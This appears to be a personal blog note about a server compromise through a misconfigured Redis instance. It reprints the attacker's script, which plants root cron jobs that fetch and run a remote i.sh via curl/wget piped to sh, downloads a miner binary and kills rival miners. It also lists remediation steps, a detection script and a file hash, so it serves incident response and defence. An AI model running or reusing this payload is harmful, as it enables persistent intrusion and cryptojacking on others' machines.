Notes on the time my server got attacked

Attacker IP

http://165.225.157.157:8000/i.sh


export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddgs.3010" ]; then
    curl -fsSL http://165.225.157.157:8000/static/3010/ddgs.$(uname -m) -o /tmp/ddgs.3010
fi
chmod +x /tmp/ddgs.3010 && /tmp/ddgs.3010

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill


This black-market operator didn't actually do any damage, though; they just used your machine to launch attacks against others, plus mining... Alibaba Cloud had raised over 200 alerts before I dealt with it (because the server was about to expire, and because of laziness).

The cause was also found: a misconfigured Redis database. I had opened it to the outside world while learning databases earlier, and someone exploited Redis to gain privileges.


Remediation

Kill the processes, remove the cron jobs, fix the vulnerability; I deleted Redis myself since it was no longer needed.


Hmm,

there was a passwordless-login key under /root/.ssh/authorized_keys; delete it, then change the password.

Mining program

  • Malicious file path: /tmp/imWBR1
  • Malicious file MD5: 9ebf7fc39efe7c553989d54965ebb468

That basically takes care of the problem.
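The three footholds described above (the cron job that re-downloads i.sh every five minutes, the key planted in authorized_keys, and the Redis instance reachable without a password) can be checked for with a small script. The one below is an added example, not code from the original post; the file paths in triage_host and the allow-list file authorized_keys.known are assumptions.

```shell
#!/bin/sh
# Added triage helpers (not from the original post) for the three footholds
# described above: cron lines piping a remote download into sh, an SSH key
# planted in authorized_keys, and a Redis config reachable without a password.
# The paths in triage_host are assumptions; adjust them for your host.

# 0 if the crontab line fetches over HTTP(S) and pipes the result into a shell.
is_remote_pipe_cron() {
    printf '%s\n' "$1" |
        grep -Eq '(curl|wget)[^|]*https?://[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Print entries of $1 (authorized_keys) absent from $2 (allow list, one full
# key line each); exit status 0 when at least one unknown key was printed.
find_unknown_keys() {
    grep -vxFf "$2" "$1" | grep -Ev '^[[:space:]]*(#|$)'
}

# 0 if redis.conf ($1) has no requirepass and any bind address is not loopback
# (no bind line at all means Redis listens on every interface).
redis_conf_exposed() {
    grep -Eq '^[[:space:]]*requirepass[[:space:]]+[^[:space:]]' "$1" && return 1
    bind=$(grep -E '^[[:space:]]*bind[[:space:]]' "$1" | tail -n 1)
    [ -n "$bind" ] || return 0
    set -f; set -- $bind; set +f   # split tokens without globbing "*"
    shift
    for addr; do
        case "$addr" in 127.0.0.1|::1|-::1|localhost) ;; *) return 0 ;; esac
    done
    return 1
}

# Walk the locations this incident used and report anything suspicious.
triage_host() {
    for f in /var/spool/cron/root /var/spool/cron/crontabs/root /etc/crontab; do
        [ -r "$f" ] || continue
        while IFS= read -r line; do
            is_remote_pipe_cron "$line" && echo "cron: $f: $line"
        done < "$f"
    done
    ls /tmp/ddgs.* 2>/dev/null | sed 's/^/dropped binary: /'
    if [ -r /root/.ssh/authorized_keys ] && [ -r /root/.ssh/authorized_keys.known ]; then
        find_unknown_keys /root/.ssh/authorized_keys /root/.ssh/authorized_keys.known |
            sed 's/^/unknown ssh key: /'
    fi
    [ -r /etc/redis/redis.conf ] && redis_conf_exposed /etc/redis/redis.conf &&
        echo "redis: no requirepass and not bound to loopback only"
    return 0
}
```

Run `triage_host` as root after sourcing the file; an empty report means none of the three footholds is present at the assumed paths.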
